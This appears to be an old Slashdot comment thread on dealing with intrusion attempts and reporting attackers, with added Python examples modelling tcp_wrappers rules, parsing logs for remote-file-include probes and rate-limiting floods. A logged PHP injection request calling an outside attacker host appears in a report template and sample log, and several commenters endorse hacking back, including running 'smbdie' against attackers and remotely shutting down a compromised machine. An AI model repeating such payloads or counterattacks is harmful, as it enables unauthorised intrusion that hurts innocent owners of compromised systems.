My advice to you is to secure your network. If you absolutely *have* to allow logins from the outside you should protect the login service by blocking it in the routers *and* use the built-in tcp_wrappers mechanism to control access. Start by blocking *everything* and then open up only those ports you need, and to those that need it. I.e. ports 80 and 25 can be publicly accessible but there is no need for anyone on the outside to send you packets on ports 137-139.

Then, run tripwire, take backups and install an IDS. Not because it will tell you of anything in advance, but because they are good for forensics work (after you have been ass-raped by some 16 year old). Above all "be paranoid" and don't simply wait until you become a wictim.
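To make the "block everything, then open only what is needed" advice concrete for tcp_wrappers, here is an added example (not the commenter's configuration) that models how tcpd evaluates hosts.allow and hosts.deny. The two file contents are constructed; matching is simplified to the forms they use (ALL, an exact address, a trailing-dot prefix and a net/mask pair), and EXCEPT clauses, hostnames and shell commands are not modelled.

```python
"""A model of how tcp_wrappers decides access, to show the
"deny everything, then open only what is needed" pattern.

Added example, not from the original comment. Matching is simplified to
the forms used here (ALL, exact address, trailing-dot prefix, net/mask);
EXCEPT clauses, hostnames and shell commands are not modelled.
"""
import ipaddress

# Constructed /etc/hosts.allow: sshd reachable only from the office block
# and one admin host. Daemons that do not link libwrap (Apache, most
# MTAs) are not covered by wrappers at all; those belong in the packet
# filter on the router, as the comment says.
HOSTS_ALLOW = """\
sshd: 192.0.2.0/255.255.255.0, 203.0.113.10
"""

# Constructed /etc/hosts.deny: everything else is refused.
HOSTS_DENY = """\
ALL: ALL
"""


def _client_matches(pattern, ip):
    if pattern == "ALL":
        return True
    if pattern.endswith("."):                 # "192.0.2." matches 192.0.2.x
        return ip.startswith(pattern)
    if "/" in pattern:                        # "net/mask" in dotted form
        net, mask = pattern.split("/", 1)
        return ipaddress.ip_address(ip) in ipaddress.ip_network(
            f"{net}/{mask}", strict=False)
    return ip == pattern


def parse_access_file(text):
    """Return [(daemon_list, client_list), ...] in file order."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        daemons, clients = line.split(":", 1)
        rules.append((daemons.replace(",", " ").split(),
                      clients.replace(",", " ").split()))
    return rules


def _any_rule_matches(rules, daemon, ip):
    return any(
        (daemon in daemons or "ALL" in daemons)
        and any(_client_matches(c, ip) for c in clients)
        for daemons, clients in rules
    )


def tcpd_decision(daemon, ip, allow_text=HOSTS_ALLOW, deny_text=HOSTS_DENY):
    """Evaluate in tcp_wrappers order: a hosts.allow match grants, else a
    hosts.deny match refuses, else access is granted. Without the
    "ALL: ALL" deny rule the default is therefore open."""
    if _any_rule_matches(parse_access_file(allow_text), daemon, ip):
        return "allow"
    if _any_rule_matches(parse_access_file(deny_text), daemon, ip):
        return "deny"
    return "allow"


if __name__ == "__main__":
    for daemon, ip in (("sshd", "192.0.2.44"), ("sshd", "198.51.100.9"),
                       ("in.telnetd", "192.0.2.44")):
        print(f"{daemon} from {ip}: {tcpd_decision(daemon, ip)}")
```

The last assertion in the check below is the one worth remembering: with an empty hosts.deny, an address that matches nothing is let in, so the deny-all line is what turns the allow list into a real whitelist.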

Re:Cinderella (1)

Jonah Hex (651948) | about 10 years ago | (#9956580)

...and don't simply wait until you become a wictim.
Where do you keep your nuclear wessels? (sorry, had to do it, the "w" isn't even close enough for a mis-type)

Jonah Hex

I had someone trying to brute force ssh.. (4, Insightful)

dan dan the dna man (461768) | about 10 years ago | (#9956511)

From a server in Brasil yesterday. I never bother reporting these things normally, but the compromised machine (ie originating the attack) was a webserver and had some "info@" addresses. I wrote, apologising for my lack of Portuguese, and an hour later had a very grateful email from the sysadmin. This is going to encourage me to report them in future.


Basically I just gave a quick digest of the log clearly showing their IP and the attack in progress, and a note to the effect that I believed their machine had been compromised (in as plain English as I could muster) - and got the desired result.


I like the fact that there's some script kiddie out there cursing that one of his "boxen" is no longer.. ;)

Call their parents (5, Funny)

Monkelectric (546685) | about 10 years ago | (#9956521)

True story: About 8 years ago some friends and I were getting o3ned DAILY by a hacker. One of these friends had a buddy in IBM's security division, who somehow got us a name and phone # of our hacker. We felt like asses when we found out we were getting beat down by a 15-year-old. But we called his dad, explained what was going on, and that we knew where he lived. Problem SOLVED :)

I'm sorry... (2, Funny)

schnits0r (633893) | about 10 years ago | (#9956524)

I didn't know that I was that big of a problem to your company, I shall stop. Sorry for any inconvenience.

Maybe related to this? (3, Informative)

ComputerizedYoga (466024) | about 10 years ago | (#9956532)

mid july or so there were a bunch of random automated-looking and weak looking ssh login attempts all over the place ....

threads on the full disclosure mailing list archives [netsys.com] and dslreports forums [dslreports.com] about that ....

wonder if this is what the topic poster was encountering?

What intruders? (0)

Anonymous Coward | about 10 years ago | (#9956543)

VERY IMPORTANT QUESTION

How are they intruders if they failed to login as root?


God, mod me down if you think im just being a troll... but seriously mod this up if you think this guy asking the question is a total dumbass.

If you don't want incoming connections, block them through whatever means you feel necessary... from a firewall to actually unplugging the network connection. You will never stop attempts while you are connected to the Internet... there are 2^32 IP addresses... granted only a portion are in use and Internet-routed, you still have way too many millions of emails to send ISPs every year...

Actual intrusions can be handled differently... but random connections and login attempts mean absolutely nothing.

Re:What intruders? - Good point! (1)

Anonymous Coward | about 10 years ago | (#9956568)

Seriously, reading through most of the comments on this story has the odor of child script kiddiez... saying "email abuse@isp.com" or "hack them back" or "run nmap and then hax0r them" or "call their parents"....

whatever. Just ignore the shit, because it isn't a problem if there is no intrusion.

IRC Shows all sorts of fun stuff (1)

HFShadow (530449) | about 10 years ago | (#9956558)

I run an irc network for work and I've seen many fun things. Most of the time I'll just place a ban and let it slide. I've seen mail + web servers try to attack the network however and that'll justify an email to some poor sysadmin.

The most unusual was a machine with a google.com reverse dns. I emailed google and they said it was impossible to be them and told me to go away basically =/

My basic template to ISPs (4, Interesting)

BrynM (217883) | about 10 years ago | (#9956562)

Please note that this is ineffectual to send to some ISPs. You won't always get a response. Look everything up first! Go look up who owns an IP at ARIN [arin.net] and who has registered domain names at a lot of different places [google.com] . Think hard before you send unless you write something automated - You may not want to send anything to someone who is actually the kiddie that attacked you. The result of that mistake is annoying. Trust me.

Due to abuse, the following IP address(es) have been banned from accessing
mydomain.com and its associated services. The abuse is detailed as
follows:

IP(s) Banned: 216.nnn.225.nn

Owner:
OrgName: SOME ISP
Address: 2 Hacker Home Street
City: Isabel
StateProv: CA
PostalCode: 01120
Country: US
Admin Address: noc@someisp.net

Reason:
Malformed URL - Attempted PHP Exploit
"216.nnn.225.nn - - [11/Aug/2004:10:03:03 -0700] "GET
/themes/default/theme.php?THEME_DIR=http://www.evil-hacker.
net/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352"

Severity: 5

Remaining bans until entire address block banned: 3

If you have any questions or need further explanation, please contact
admin@mydomain.com.

You
Your Title
Your Contact Info
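The template above is filled in by hand from an access-log line and a WHOIS lookup. The script below is an added example, not the poster's own tool: it pulls the remote-file-include probes (a query parameter whose value is an external URL, as in the template's theme.php line) out of Apache combined-format log lines, groups them by source address, and renders one notice per address with the per-/24 countdown the template carries. The log lines and the WHOIS data are constructed; a real script would query the registry (ARIN for the block in the template) instead of the stub dictionary.

```python
"""Turn Apache access-log evidence into the abuse notice above.

Added example, not the original poster's script. The log lines and the
WHOIS data are constructed; a real script would query the RIR instead
of the FAKE_WHOIS stub.
"""
import re
from collections import Counter

APACHE_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# A query parameter pointing at an external URL: the remote-file-include
# probe shown in the template, usually with shell commands tacked on.
RFI_PROBE = re.compile(r'[?&][A-Za-z0-9_]+=https?://', re.IGNORECASE)

SAMPLE_ACCESS_LOG = """\
203.0.113.45 - - [11/Aug/2004:10:03:03 -0700] "GET /themes/default/theme.php?THEME_DIR=http://evil.example/1.jpg?&cmd=uname%20-a;id; HTTP/1.0" 400 352
203.0.113.45 - - [11/Aug/2004:10:03:05 -0700] "GET /index.php?page=http://evil.example/s.txt? HTTP/1.0" 404 290
198.51.100.20 - - [11/Aug/2004:10:05:11 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120
"""

# Constructed stand-in for a WHOIS lookup, keyed by /24.
FAKE_WHOIS = {
    "203.0.113.0/24": {"OrgName": "SOME ISP", "Country": "US",
                       "Abuse": "abuse@someisp.example"},
}


def netblock(ip):
    """The /24 an IPv4 address sits in (the granularity the template bans by)."""
    return ".".join(ip.split(".")[:3]) + ".0/24"


def find_rfi_attempts(log_text):
    """Every parsed line whose request URL carries an RFI-style parameter."""
    hits = []
    for line in log_text.splitlines():
        m = APACHE_LINE.match(line)
        if m and RFI_PROBE.search(m["url"]):
            hits.append({"ip": m["ip"], "timestamp": m["ts"], "line": line})
    return hits


def build_reports(hits, whois=FAKE_WHOIS, ban_limit=4, domain="mydomain.com"):
    """One notice per offending IP, with the template's block-level countdown.
    The countdown only counts IPs in this batch; a real tool would persist
    the per-block tally between runs."""
    by_ip = {}
    for h in hits:
        by_ip.setdefault(h["ip"], []).append(h)
    banned_per_block = Counter(netblock(ip) for ip in by_ip)
    reports = {}
    for ip, entries in by_ip.items():
        block = netblock(ip)
        owner = whois.get(block, {"OrgName": "unknown"})
        lines = [
            "Due to abuse, the following IP address has been banned from",
            f"accessing {domain} and its associated services:",
            "",
            f"IP Banned: {ip}",
            "",
            "Owner:",
            *[f"  {k}: {v}" for k, v in owner.items()],
            "",
            "Reason:",
            "Malformed URL - attempted remote file include",
            *[f'  "{e["line"]}"' for e in entries],
            "",
            "Severity: 5",
            f"Remaining bans until entire address block {block} banned: "
            f"{ban_limit - banned_per_block[block]}",
        ]
        reports[ip] = "\n".join(lines)
    return reports


if __name__ == "__main__":
    for report in build_reports(find_rfi_attempts(SAMPLE_ACCESS_LOG)).values():
        print(report, end="\n\n")
```

The legitimate "page=about" request is left alone because its parameter value is not a URL; the two probes from 203.0.113.45 collapse into one notice, which is what you want when you are writing to a human at the other end.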

Just my (short) experience. A suggestion. (2, Interesting)

pasko (758206) | about 10 years ago | (#9956567)

Last week I managed to log in as root into a machine (from a Chinese domain, as usual) for which I had packets logged in my firewall's log. Then, I installed chkrootkit on that machine: lots of executables were wrong (rootkits). Then, someone logged in remotely and left in /root a "readme.txt" message warning me not to log in to other people's computers .... Finally I did three things:
1. Sent an e-mail to the contact addresses retrieved from APNIC
2. Copied my shutdown executable to that machine (the original was obviously tricked)
3. Remotely executed "shutdown -h now"
Just a suggestion.

corporate cease-and-desist gnome (1)

evil_one666 (664331) | about 10 years ago | (#9956571)


I've got their IP addresses and can usually tracert their ISP's - is there an accepted type of letter to send them without seeming like one of the corporate cease-and-desist gnomes?"
Despite the fact that you work for a small company, you will in fact be a corporate cease-and-desist gnome if you send out such a letter. That is unfortunately the price you pay.

Firewall? (2, Interesting)

vandan (151516) | about 10 years ago | (#9956574)

Complaining to people won't get you anywhere, unless you go to the government and claim that you believe they are terrorists. That will get you some action.

My advice is to firewall them.

Personally I also try giving them a taste of their own medicine. You'd be surprised how many Windows machines are still vulnerable to the old 'smbdie'. I set up a cron job to 'smbdie' all hackers / spammers etc every 5 minutes. But of course this is horrible advice because ( and I'm sure everyone will respond and tell you that it's very naughty to fight fire with fire, and you will most likely go blind or some bullshit. )

So yeah. Firewall them. And if you've got time, email their ISP and tell them that you've firewalled them and if you have any complaints from customers about them not being able to access your server, that you will advise them that their ISP is harbouring hackers and that they should switch ISPs.

Hack them back! (4, Funny)

Numen (244707) | about 10 years ago | (#9956579)

Whatever they're doing to you have a go back at them... chances are their system isn't as secure as yours.

At the very least it's more fun than writing an e-mail!

Contact the ISP... (1)

zxflash (773348) | about 10 years ago | (#9956589)

The word liability will freak out any small ISP enough to contact the "user" and give them a stern warning... I don't know if you'd have any luck with one of the big boys (AOL, Earthlink...)

normal for this time of year (5, Funny)

phek (791955) | about 10 years ago | (#9956596)

It's really normal to notice a huge increase in attacks this time of year. With the passing of defcon and black hat this month, a lot of new security vulnerabilities have been released, and all of the 'script kiddies' are eager to try them out. The best thing to do is make sure all your software is up to date, and get familiar with the new vulnerabilities that are out so you can protect yourself.

As far as reporting them, you could try all day and not be able to report all of them, and even if you did, they're most likely attacking from someone else's vulnerable machine. The only thing you can really do is watch out for anyone who's aggressively attacking you (i.e. one person who's running lots of attacks on you trying desperately to break into your machine at any cost), and report those ones, or if you can find a way to contact that person, tell them to stop before you report them to their isp and/or authorities, this will usually scare most people off.

Once you do start paying some decent attention to security releases, a lot of these stupid things people try won't surprise you, like the ssh root attempt is because some tool came out recently that just scans netblocks for anyone running ssh and tries logging in as two different users with no password, root being one of them. If you're not familiar with where to find security releases, here's some good places to start:

packetstorm security [packetstormsecurity.org]
Security Focus [securityfocus.com]

Somewhat offtopic, but how do people deal with DOS (5, Interesting)

bretharder (771353) | about 10 years ago | (#9956597)

Somewhat offtopic, but how do people deal with DOS attacks?
I've had a person harassing the forums at a website that I host.
I banned him by IP and then he started using proxies,
so I had to write a script to ban his IP each time he logged in,
of course then he started creating new accounts;
so I had to change the forum registration to one account per unique email address.
And then he tried to DOS the site by visiting the site and locking down his F5 key.
(He actually confessed this to me in IRC; he had 4 other people do this with him.)
I sent Comcast (his isp) the IRC logs & the network monitor logs.
They sent me a generic response saying "blah blah blah.. this is an automated response".
And that's it.
So how do other /.ers deal with situations like this?
It's a personal website, and I don't have the funds to hire a lawyer.
I've banned his IP and ~6000 proxy IPs, but he still keeps getting through.
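The "hold down F5" flood described above is the one part of this that a per-address rate limit handles well: a handful of addresses each sending several requests a second is easy to tell from readers. The code below is an added example, not the poster's script. Timestamps are simulated so it runs offline; in a web application the same allow() call would sit in front of the forum's request handler. It does nothing for the account-hopping or proxy-hopping the post describes, which needs limits keyed on something other than the source address.

```python
"""Per-IP request rate limiting for a "hold down F5" flood.

Added example, not from the original post. Timestamps are simulated so
the module runs offline; in a web app allow() would wrap the handler.
"""
from collections import defaultdict, deque


class RequestLimiter:
    """Sliding window: more than max_requests from one IP inside
    window_seconds earns a ban for ban_seconds."""

    def __init__(self, max_requests=30, window_seconds=10.0, ban_seconds=300.0):
        self.max_requests = max_requests
        self.window = window_seconds
        self.ban = ban_seconds
        self.recent = defaultdict(deque)   # ip -> timestamps inside the window
        self.banned_until = {}             # ip -> time the ban lifts

    def allow(self, ip, now):
        """Return True if the request may proceed, False if it is dropped."""
        if self.banned_until.get(ip, 0.0) > now:
            return False
        q = self.recent[ip]
        while q and q[0] <= now - self.window:   # expire hits outside the window
            q.popleft()
        q.append(now)
        if len(q) > self.max_requests:
            self.banned_until[ip] = now + self.ban
            q.clear()
            return False
        return True


def simulate_flood():
    """One address at 10 requests/s for 5 s (the F5 key) next to a reader
    loading one page every 2 s; returns what got through."""
    lim = RequestLimiter(max_requests=30, window_seconds=10.0, ban_seconds=300.0)
    outcome = {"flooder_allowed": 0, "flooder_dropped": 0, "reader_allowed": 0}
    for i in range(50):
        if lim.allow("203.0.113.77", i * 0.1):      # constructed flooder address
            outcome["flooder_allowed"] += 1
        else:
            outcome["flooder_dropped"] += 1
    for i in range(5):
        if lim.allow("198.51.100.5", i * 2.0):      # constructed reader address
            outcome["reader_allowed"] += 1
    # Once the ban has lapsed the flooder is served again, so a persistent
    # attacker costs at most max_requests per ban period.
    outcome["flooder_after_ban"] = lim.allow("203.0.113.77", 400.0)
    return outcome


if __name__ == "__main__":
    print(simulate_flood())
```

With these numbers the flooder gets 30 pages and is then dropped for five minutes, while the reader is never touched; tune max_requests to what a real page load generates (images and stylesheets count too) before putting it in front of a forum.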

Re:Somewhat offtopic, but how do people deal with (1)

phek (791955) | about 10 years ago | (#9956612)

well step #1 would be get your site on a server with enough bandwidth so that a few people holding down refresh key isn't going to DOS your site.

Re:Somewhat offtopic, but how do people deal with (1)

bretharder (771353) | about 10 years ago | (#9956627)

So basically I should give in to the f*ckwad and fork over more cash for more bandwidth on a site that -under normal circumstances- doesn't require much bandwidth?

This thread explains your problem ! (0)

Anonymous Coward | about 10 years ago | (#9956629)

This thread explains your problem :

http://www.dslreports.com/forum/remark,10854834~mode=flat~days=9999